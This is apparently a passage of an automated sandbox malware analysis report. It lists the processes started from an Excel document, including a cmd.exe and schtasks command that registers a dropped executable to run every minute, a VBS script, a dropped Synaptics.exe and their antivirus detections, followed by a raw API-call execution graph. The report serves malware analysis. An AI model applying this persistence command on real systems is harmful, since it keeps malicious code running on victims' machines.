                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0x8d0000
                                                                                                              File size:53'161'064 bytes
                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:05:35:47
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                                                                                              Imagebase:0x240000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:05:35:47
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:05:35:47
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs
                                                                                                              Imagebase:0xad0000
                                                                                                              File size:147'456 bytes
                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:7
                                                                                                              Start time:05:35:48
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                                                                                              Imagebase:0xdd0000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:05:35:49
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 58%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:05:35:58
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:12
                                                                                                              Start time:05:36:01
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:05:36:06
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:771'584 bytes
                                                                                                              MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:05:36:15
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:05:36:23
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:05:37:00
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                                              Imagebase:0xd40000
                                                                                                              File size:1'433'600 bytes
                                                                                                              MD5 hash:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:05:37:50
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                                              Imagebase:0x7ff670590000
                                                                                                              File size:163'840 bytes
                                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.4%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:6.2%
                                                                                                                Total number of Nodes:1461
                                                                                                                Total number of Limit Nodes:145
                                                                                                                execution_graph 103023 db1edb 103028 d4131c 103023->103028 103025 db1ee1 103061 d61b2a 52 API calls __cinit 103025->103061 103027 db1eeb 103029 d4133e 103028->103029 103062 d41624 103029->103062 103036 d4d3d2 48 API calls 103037 d41388 103036->103037 103038 d4d3d2 48 API calls 103037->103038 103039 d41392 103038->103039 103040 d4d3d2 48 API calls 103039->103040 103041 d413d8 103040->103041 103042 d4d3d2 48 API calls 103041->103042 103043 d414bb 103042->103043 103075 d41673 103043->103075 103047 d414eb 103048 d4d3d2 48 API calls 103047->103048 103049 d414f5 103048->103049 103104 d4175e 103049->103104 103051 d41540 103052 d41550 GetStdHandle 103051->103052 103053 db58da 103052->103053 103054 d415ab 103052->103054 103053->103054 103056 db58e3 103053->103056 103055 d415b1 CoInitialize 103054->103055 103055->103025 103111 d89bd1 53 API calls 103056->103111 103058 db58ea 103112 d8a2f6 CreateThread 103058->103112 103060 db58f6 CloseHandle 103060->103055 103061->103027 103113 d417e0 103062->103113 103066 d41344 103067 d416db 103066->103067 103183 d41867 6 API calls 103067->103183 103069 d41374 103070 d4d3d2 103069->103070 103071 d6010a 48 API calls 103070->103071 103072 d4d3f3 103071->103072 103073 d6010a 48 API calls 103072->103073 103074 d4137e 103073->103074 103074->103036 103076 d4d3d2 48 API calls 103075->103076 103077 d41683 103076->103077 103078 d4d3d2 48 API calls 103077->103078 103079 d4168b 103078->103079 103184 d47d70 103079->103184 103082 d47d70 48 API calls 103083 d4169b 103082->103083 103084 d4d3d2 48 API calls 103083->103084 103085 d416a6 103084->103085 103086 d6010a 48 API calls 103085->103086 103087 d414c5 103086->103087 103088 d416f2 103087->103088 103089 d41700 103088->103089 103090 d4d3d2 48 API calls 103089->103090 103091 d4170b 103090->103091 103092 d4d3d2 48 API calls 103091->103092 103093 d41716 103092->103093 103094 d4d3d2 48 API calls 103093->103094 103095 d41721 103094->103095 103096 d4d3d2 48 API calls 103095->103096 103097 d4172c 103096->103097 103098 d47d70 48 API calls 103097->103098 103099 d41737 103098->103099 103100 d6010a 48 API calls 103099->103100 103101 d4173e 103100->103101 103102 d41747 RegisterWindowMessageW 103101->103102 103103 db24a6 103101->103103 103102->103047 103105 db67dd 103104->103105 103106 d4176e 103104->103106 103189 d8d231 50 API calls 103105->103189 103107 d6010a 48 API calls 103106->103107 103109 d41776 103107->103109 103109->103051 103110 db67e8 103111->103058 103112->103060 103190 d8a2dc 54 API calls 103112->103190 103129 d417fc 103113->103129 103116 d417fc 48 API calls 103117 d417f0 103116->103117 103118 d4d3d2 48 API calls 103117->103118 103119 d4165b 103118->103119 103120 d47e53 103119->103120 103121 d47ecf 103120->103121 103123 d47e5f __wsetenvp 103120->103123 103138 d4a2fb 103121->103138 103124 d47ec7 103123->103124 103125 d47e7b 103123->103125 103137 d47eda 48 API calls 103124->103137 103136 d4a6f8 48 API calls 103125->103136 103128 d47e85 _memmove 103128->103066 103130 d4d3d2 48 API calls 103129->103130 103131 d41807 103130->103131 103132 d4d3d2 48 API calls 103131->103132 103133 d4180f 103132->103133 103134 d4d3d2 48 API calls 103133->103134 103135 d417e8 103134->103135 103135->103116 103136->103128 103137->103128 103139 d4a309 103138->103139 103141 d4a321 _memmove 103138->103141 103139->103141 103142 d4b8a7 103139->103142 103141->103128 103143 d4b8ba 103142->103143 103145 d4b8b7 _memmove 103142->103145 103146 d6010a 103143->103146 103145->103141 103148 d60112 __calloc_impl 103146->103148 103149 d6012c 103148->103149 103150 d6012e std::exception::exception 103148->103150 103155 d645ec 103148->103155 103149->103145 103169 d67495 RaiseException 103150->103169 103152 d60158 103170 d673cb 47 API calls _free 103152->103170 103154 d6016a 103154->103145 103156 d64667 __calloc_impl 103155->103156 103162 d645f8 __calloc_impl 103155->103162 103178 d6889e 47 API calls __getptd_noexit 103156->103178 103159 d6462b RtlAllocateHeap 103160 d6465f 103159->103160 103159->103162 103160->103148 103162->103159 103163 d64653 103162->103163 103164 d64603 103162->103164 103167 d64651 103162->103167 103176 d6889e 47 API calls __getptd_noexit 103163->103176 103164->103162 103171 d68e52 47 API calls 2 library calls 103164->103171 103172 d68eb2 47 API calls 8 library calls 103164->103172 103173 d61d65 103164->103173 103177 d6889e 47 API calls __getptd_noexit 103167->103177 103169->103152 103170->103154 103171->103164 103172->103164 103179 d61d33 GetModuleHandleExW 103173->103179 103176->103167 103177->103160 103178->103160 103180 d61d63 ExitProcess 103179->103180 103181 d61d4c GetProcAddress 103179->103181 103181->103180 103182 d61d5e 103181->103182 103182->103180 103183->103069 103185 d4d3d2 48 API calls 103184->103185 103186 d47d79 103185->103186 103187 d4d3d2 48 API calls 103186->103187 103188 d41693 103187->103188 103188->103082 103189->103110 103191 db1e8b 103196 d5e44f 103191->103196 103195 db1e9a 103197 d6010a 48 API calls 103196->103197 103198 d5e457 103197->103198 103200 d5e46b 103198->103200 103204 d5e74b 103198->103204 103203 d61b2a 52 API calls __cinit 103200->103203 103203->103195 103205 d5e754 103204->103205 103206 d5e463 103204->103206 103236 d61b2a 52 API calls __cinit 103205->103236 103208 d5e47b 103206->103208 103209 d4d3d2 48 API calls 103208->103209 103210 d5e492 GetVersionExW 103209->103210 103211 d47e53 48 API calls 103210->103211 103212 d5e4d5 103211->103212 103237 d5e5f8 103212->103237 103217 db29f9 103219 d5e576 103221 d5e5ec GetSystemInfo 103219->103221 103222 d5e59e 103219->103222 103220 d5e55f GetCurrentProcess 103254 d5e70e LoadLibraryA GetProcAddress 103220->103254 103225 d5e5c9 103221->103225 103248 d5e694 103222->103248 103228 d5e5d7 FreeLibrary 103225->103228 103229 d5e5dc 103225->103229 103228->103229 103229->103200 103230 d5e5e4 GetSystemInfo 103232 d5e5be 103230->103232 103231 d5e5b4 103251 d5e437 103231->103251 103232->103225 103235 d5e5c4 FreeLibrary 103232->103235 103235->103225 103236->103206 103238 d5e601 103237->103238 103239 d4a2fb 48 API calls 103238->103239 103240 d5e4dd 103239->103240 103241 d5e617 103240->103241 103242 d5e625 103241->103242 103243 d4a2fb 48 API calls 103242->103243 103244 d5e4e9 103243->103244 103244->103217 103245 d5e6d1 103244->103245 103255 d5e6e3 103245->103255 103259 d5e6a6 103248->103259 103252 d5e694 2 API calls 103251->103252 103253 d5e43f GetNativeSystemInfo 103252->103253 103253->103232 103254->103219 103256 d5e55b 103255->103256 103257 d5e6ec LoadLibraryA 103255->103257 103256->103219 103256->103220 103257->103256 103258 d5e6fd GetProcAddress 103257->103258 103258->103256 103260 d5e5ac 103259->103260 103261 d5e6af LoadLibraryA 103259->103261 103260->103230 103260->103231 103261->103260 103262 d5e6c0 GetProcAddress 103261->103262 103262->103260 103263 db1eca 103268 d5be17 103263->103268 103267 db1ed9 103269 d4d3d2 48 API calls 103268->103269 103270 d5be85 103269->103270 103276 d5c929 103270->103276 103272 d5bf22 103274 d5bf3e 103272->103274 103279 d5c8b7 48 API calls _memmove 103272->103279 103275 d61b2a 52 API calls __cinit 103274->103275 103275->103267 103280 d5c955 103276->103280 103279->103272 103281 d5c948 103280->103281 103282 d5c962 103280->103282 103281->103272 103282->103281 103283 d5c969 RegOpenKeyExW 103282->103283 103283->103281 103284 d5c983 RegQueryValueExW 103283->103284 103285 d5c9a4 103284->103285 103286 d5c9b9 RegCloseKey 103284->103286 103285->103286 103286->103281 103287 db1f5f 103290 d445a7 103287->103290 103291 d445e6 mciSendStringW 103290->103291 103292 db5935 DestroyWindow 103290->103292 103293 d44604 103291->103293 103294 d447a6 103291->103294 103295 db5941 103292->103295 103293->103295 103296 d44610 103293->103296 103294->103293 103297 d447b5 UnregisterHotKey 103294->103297 103298 db595a FindClose 103295->103298 103299 db5946 103295->103299 103301 db5976 103296->103301 103302 d4462b 103296->103302 103297->103294 103298->103301 103320 d450ec CloseHandle 103299->103320 103304 db59ac 103301->103304 103305 db599b FreeLibrary 103301->103305 103302->103304 103309 d44639 103302->103309 103303 db5950 103303->103301 103306 db59c0 VirtualFree 103304->103306 103311 d446a6 103304->103311 103305->103301 103306->103304 103307 d44695 CoUninitialize 103307->103311 103309->103307 103310 d446ae Mailbox 103319 d44208 47 API calls Mailbox 103310->103319 103318 d432c9 CloseHandle 103311->103318 103313 d446c9 Mailbox 103314 d42de4 47 API calls 103313->103314 103315 d446df Mailbox 103314->103315 103316 d43282 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 103315->103316 103317 d447a1 103316->103317 103318->103310 103320->103303 103321 db1eed 103326 d5e975 103321->103326 103323 db1f01 103342 d61b2a 52 API calls __cinit 103323->103342 103325 db1f0b 103327 d6010a 48 API calls 103326->103327 103328 d5ea27 GetModuleFileNameW 103327->103328 103343 d6297d 103328->103343 103330 d5ea5b _wcsncat 103346 d62bff 103330->103346 103333 d6010a 48 API calls 103334 d5ea94 _wcscpy 103333->103334 103335 d4d3d2 48 API calls 103334->103335 103336 d5eacf 103335->103336 103349 d5eb05 103336->103349 103338 d5eae0 Mailbox 103338->103323 103339 d6010a 48 API calls 103340 d5eada _wcscat __wsetenvp _wcsncpy 103339->103340 103340->103338 103340->103339 103341 d4a4f6 48 API calls 103340->103341 103341->103340 103342->103325 103363 d629c7 103343->103363 103389 d6aab9 103346->103389 103401 d4c4cd 103349->103401 103351 d5eb14 RegOpenKeyExW 103352 d5eb35 103351->103352 103353 db4b17 RegQueryValueExW 103351->103353 103352->103340 103354 db4b91 RegCloseKey 103353->103354 103355 db4b30 103353->103355 103356 d6010a 48 API calls 103355->103356 103357 db4b49 103356->103357 103405 d44bce 103357->103405 103360 db4b86 103360->103354 103361 db4b6f 103362 d47e53 48 API calls 103361->103362 103362->103360 103364 d629e2 103363->103364 103368 d629d6 103363->103368 103387 d6889e 47 API calls __getptd_noexit 103364->103387 103366 d62b9a 103372 d629c2 103366->103372 103388 d67aa0 8 API calls __strnicmp_l 103366->103388 103368->103364 103374 d62a55 103368->103374 103382 d6a9fb 47 API calls 2 library calls 103368->103382 103370 d62b21 103370->103364 103370->103372 103375 d62b31 103370->103375 103371 d62ae0 103371->103364 103373 d62afc 103371->103373 103384 d6a9fb 47 API calls 2 library calls 103371->103384 103372->103330 103373->103364 103373->103372 103378 d62b12 103373->103378 103374->103364 103381 d62ac2 103374->103381 103383 d6a9fb 47 API calls 2 library calls 103374->103383 103386 d6a9fb 47 API calls 2 library calls 103375->103386 103385 d6a9fb 47 API calls 2 library calls 103378->103385 103381->103370 103381->103371 103382->103374 103383->103381 103384->103373 103385->103372 103386->103372 103387->103366 103388->103372 103390 d6abc6 103389->103390 103391 d6aaca 103389->103391 103399 d6889e 47 API calls __getptd_noexit 103390->103399 103391->103390 103397 d6aad5 103391->103397 103394 d5ea8a 103394->103333 103396 d6abbb 103400 d67aa0 8 API calls __strnicmp_l 103396->103400 103397->103394 103398 d6889e 47 API calls __getptd_noexit 103397->103398 103398->103396 103399->103396 103400->103394 103402 d4c4e7 103401->103402 103403 d4c4da 103401->103403 103404 d6010a 48 API calls 103402->103404 103403->103351 103404->103403 103406 d6010a 48 API calls 103405->103406 103407 d44be0 RegQueryValueExW 103406->103407 103407->103360 103407->103361 103408 d66a80 103409 d66a8c __setmbcp 103408->103409 103445 d68b7b GetStartupInfoW 103409->103445 103412 d66a91 103447 d6a937 GetProcessHeap 103412->103447 103413 d66ae9 103414 d66af4 103413->103414 103535 d66bd0 47 API calls 3 library calls 103413->103535 103448 d687d7 103414->103448 103417 d66afa 103418 d66b05 __RTC_Initialize 103417->103418 103536 d66bd0 47 API calls 3 library calls 103417->103536 103469 d6ba66 103418->103469 103421 d66b14 103422 d66b20 GetCommandLineW 103421->103422 103537 d66bd0 47 API calls 3 library calls 103421->103537 103488 d73c2d GetEnvironmentStringsW 103422->103488 103425 d66b1f 103425->103422 103429 d66b45 103501 d73a64 103429->103501 103432 d66b4b 103435 d66b56 103432->103435 103539 d61d7b 47 API calls 3 library calls 103432->103539 103515 d61db5 103435->103515 103436 d66b5e 103437 d66b69 __wwincmdln 103436->103437 103540 d61d7b 47 API calls 3 library calls 103436->103540 103519 d43682 103437->103519 103440 d66b7d 103441 d66b8c 103440->103441 103532 d62011 103440->103532 103541 d61da6 47 API calls _doexit 103441->103541 103444 d66b91 __setmbcp 103446 d68b91 103445->103446 103446->103412 103447->103413 103542 d61e5a 30 API calls 2 library calls 103448->103542 103450 d687dc 103543 d68ab3 InitializeCriticalSectionAndSpinCount 103450->103543 103452 d687e1 103453 d687e5 103452->103453 103545 d68afd TlsAlloc 103452->103545 103544 d6884d 50 API calls 2 library calls 103453->103544 103456 d687ea 103456->103417 103457 d687f7 103457->103453 103458 d68802 103457->103458 103546 d67616 103458->103546 103461 d68844 103554 d6884d 50 API calls 2 library calls 103461->103554 103464 d68823 103464->103461 103466 d68829 103464->103466 103465 d68849 103465->103417 103553 d68724 47 API calls 4 library calls 103466->103553 103468 d68831 GetCurrentThreadId 103468->103417 103470 d6ba72 __setmbcp 103469->103470 103563 d68984 103470->103563 103472 d6ba79 103473 d67616 __calloc_crt 47 API calls 103472->103473 103474 d6ba8a 103473->103474 103475 d6baf5 GetStartupInfoW 103474->103475 103476 d6ba95 @_EH4_CallFilterFunc@8 __setmbcp 103474->103476 103482 d6bc33 103475->103482 103485 d6bb0a 103475->103485 103476->103421 103477 d6bcf7 103570 d6bd0b LeaveCriticalSection _doexit 103477->103570 103479 d6bc7c GetStdHandle 103479->103482 103480 d67616 __calloc_crt 47 API calls 103480->103485 103481 d6bc8e GetFileType 103481->103482 103482->103477 103482->103479 103482->103481 103484 d6bcbb InitializeCriticalSectionAndSpinCount 103482->103484 103483 d6bb58 103483->103482 103486 d6bb8a GetFileType 103483->103486 103487 d6bb98 InitializeCriticalSectionAndSpinCount 103483->103487 103484->103482 103485->103480 103485->103482 103485->103483 103486->103483 103486->103487 103487->103483 103489 d66b30 103488->103489 103490 d73c3e 103488->103490 103495 d7382b GetModuleFileNameW 103489->103495 103608 d67660 47 API calls std::exception::_Copy_str 103490->103608 103493 d73c7a FreeEnvironmentStringsW 103493->103489 103494 d73c64 _memmove 103494->103493 103496 d7385f _wparse_cmdline 103495->103496 103497 d66b3a 103496->103497 103498 d73899 103496->103498 103497->103429 103538 d61d7b 47 API calls 3 library calls 103497->103538 103609 d67660 47 API calls std::exception::_Copy_str 103498->103609 103500 d7389f _wparse_cmdline 103500->103497 103502 d73a7d __wsetenvp 103501->103502 103506 d73a75 103501->103506 103503 d67616 __calloc_crt 47 API calls 103502->103503 103511 d73aa6 __wsetenvp 103503->103511 103504 d73afd 103505 d628ca _free 47 API calls 103504->103505 103505->103506 103506->103432 103507 d67616 __calloc_crt 47 API calls 103507->103511 103508 d73b22 103509 d628ca _free 47 API calls 103508->103509 103509->103506 103511->103504 103511->103506 103511->103507 103511->103508 103512 d73b39 103511->103512 103610 d73317 47 API calls 2 library calls 103511->103610 103611 d67ab0 IsProcessorFeaturePresent 103512->103611 103514 d73b45 103514->103432 103516 d61dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 103515->103516 103518 d61e00 __IsNonwritableInCurrentImage 103516->103518 103634 d61b2a 52 API calls __cinit 103516->103634 103518->103436 103520 d4369c 103519->103520 103521 db23b5 103519->103521 103522 d436d6 IsThemeActive 103520->103522 103635 d62025 103522->103635 103526 d43702 103647 d432de SystemParametersInfoW SystemParametersInfoW 103526->103647 103528 d4370e 103648 d4374e GetCurrentDirectoryW 103528->103648 103531 d4373b 103531->103440 104834 d61ee2 103532->104834 103534 d62020 103534->103441 103535->103414 103536->103418 103537->103425 103541->103444 103542->103450 103543->103452 103544->103456 103545->103457 103548 d6761d 103546->103548 103549 d6765a 103548->103549 103550 d6763b Sleep 103548->103550 103555 d73e5a 103548->103555 103549->103461 103552 d68b59 TlsSetValue 103549->103552 103551 d67652 103550->103551 103551->103548 103551->103549 103552->103464 103553->103468 103554->103465 103556 d73e65 103555->103556 103561 d73e80 __calloc_impl 103555->103561 103557 d73e71 103556->103557 103556->103561 103562 d6889e 47 API calls __getptd_noexit 103557->103562 103559 d73e90 HeapAlloc 103560 d73e76 103559->103560 103559->103561 103560->103548 103561->103559 103561->103560 103562->103560 103564 d68995 103563->103564 103565 d689a8 EnterCriticalSection 103563->103565 103571 d68a0c 103564->103571 103565->103472 103567 d6899b 103567->103565 103595 d61d7b 47 API calls 3 library calls 103567->103595 103570->103476 103572 d68a18 __setmbcp 103571->103572 103573 d68a21 103572->103573 103574 d68a39 103572->103574 103596 d68e52 47 API calls 2 library calls 103573->103596 103581 d68aa1 __setmbcp 103574->103581 103589 d68a37 103574->103589 103576 d68a26 103597 d68eb2 47 API calls 8 library calls 103576->103597 103579 d68a4d 103582 d68a54 103579->103582 103583 d68a63 103579->103583 103580 d68a2d 103585 d61d65 __mtinitlocknum 3 API calls 103580->103585 103581->103567 103599 d6889e 47 API calls __getptd_noexit 103582->103599 103584 d68984 __lock 46 API calls 103583->103584 103588 d68a6a 103584->103588 103585->103589 103587 d68a59 103587->103581 103590 d68a8e 103588->103590 103591 d68a79 InitializeCriticalSectionAndSpinCount 103588->103591 103589->103574 103598 d67660 47 API calls std::exception::_Copy_str 103589->103598 103600 d628ca 103590->103600 103592 d68a94 103591->103592 103606 d68aaa LeaveCriticalSection _doexit 103592->103606 103596->103576 103597->103580 103598->103579 103599->103587 103601 d628d3 RtlFreeHeap 103600->103601 103602 d628fc __dosmaperr 103600->103602 103601->103602 103603 d628e8 103601->103603 103602->103592 103607 d6889e 47 API calls __getptd_noexit 103603->103607 103605 d628ee GetLastError 103605->103602 103606->103581 103607->103605 103608->103494 103609->103500 103610->103511 103612 d67abb 103611->103612 103617 d67945 103612->103617 103616 d67ad6 103616->103514 103618 d6795f _memset __call_reportfault 103617->103618 103619 d6797f IsDebuggerPresent 103618->103619 103625 d68e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 103619->103625 103621 d67a43 __call_reportfault 103626 d6b4bf 103621->103626 103623 d67a66 103624 d68e27 GetCurrentProcess TerminateProcess 103623->103624 103624->103616 103625->103621 103627 d6b4c7 103626->103627 103628 d6b4c9 IsProcessorFeaturePresent 103626->103628 103627->103623 103630 d74560 103628->103630 103633 d7450f 5 API calls 2 library calls 103630->103633 103632 d74643 103632->103623 103633->103632 103634->103518 103636 d68984 __lock 47 API calls 103635->103636 103637 d62030 103636->103637 103693 d68ae8 LeaveCriticalSection 103637->103693 103639 d436fb 103640 d6208d 103639->103640 103641 d62097 103640->103641 103642 d620b1 103640->103642 103641->103642 103694 d6889e 47 API calls __getptd_noexit 103641->103694 103642->103526 103644 d620a1 103695 d67aa0 8 API calls __strnicmp_l 103644->103695 103646 d620ac 103646->103526 103647->103528 103696 d44257 103648->103696 103650 d4377f IsDebuggerPresent 103651 d4378d 103650->103651 103652 db21b7 MessageBoxA 103650->103652 103653 d43852 103651->103653 103654 db21d0 103651->103654 103655 d437aa 103651->103655 103652->103654 103656 d43859 SetCurrentDirectoryW 103653->103656 103856 d82f5b 48 API calls 103654->103856 103760 d43bff 103655->103760 103659 d43716 SystemParametersInfoW 103656->103659 103659->103531 103661 d437c8 GetFullPathNameW 103772 d434f3 103661->103772 103662 db21e0 103665 db21f6 SetCurrentDirectoryW 103662->103665 103665->103659 103666 d4380f 103667 d43818 103666->103667 103857 d7be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 103666->103857 103787 d430a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103667->103787 103670 db2213 103670->103667 103674 db2224 GetModuleFileNameW 103670->103674 103673 d43822 103675 d43837 103673->103675 103854 d43598 67 API calls _memset 103673->103854 103858 d4caee 103674->103858 103795 d4e1f0 103675->103795 103681 db224c 103862 d439e8 48 API calls 2 library calls 103681->103862 103682 db2271 103865 d439e8 48 API calls 2 library calls 103682->103865 103685 db2257 103863 d439e8 48 API calls 2 library calls 103685->103863 103687 db226d GetForegroundWindow ShellExecuteW 103691 db22a5 Mailbox 103687->103691 103690 db2264 103864 d439e8 48 API calls 2 library calls 103690->103864 103691->103653 103693->103639 103694->103644 103695->103646 103866 d43c70 103696->103866 103700 d44278 GetModuleFileNameW 103883 d434c1 103700->103883 103705 d4caee 48 API calls 103706 d442ba 103705->103706 103898 d4d380 103706->103898 103708 d442ca Mailbox 103709 d4caee 48 API calls 103708->103709 103710 d442f2 103709->103710 103711 d4d380 55 API calls 103710->103711 103712 d44305 Mailbox 103711->103712 103713 d4caee 48 API calls 103712->103713 103714 d44316 103713->103714 103902 d4d2d2 103714->103902 103716 d44328 Mailbox 103717 d4d3d2 48 API calls 103716->103717 103718 d4433b 103717->103718 103908 d44477 103718->103908 103722 d44355 103723 d4435f 103722->103723 103724 db20f7 103722->103724 103725 d61bc7 _W_store_winword 59 API calls 103723->103725 103726 d44477 48 API calls 103724->103726 103727 d4436a 103725->103727 103728 db210b 103726->103728 103727->103728 103729 d44374 103727->103729 103731 d44477 48 API calls 103728->103731 103730 d61bc7 _W_store_winword 59 API calls 103729->103730 103732 d4437f 103730->103732 103733 db2127 103731->103733 103734 db212f GetModuleFileNameW 103732->103734 103735 d44389 103732->103735 103733->103734 103736 d44477 48 API calls 103734->103736 103737 d61bc7 _W_store_winword 59 API calls 103735->103737 103738 db2160 103736->103738 103739 d44394 103737->103739 103952 d4c935 103738->103952 103741 d443d6 103739->103741 103743 db2185 _wcscpy 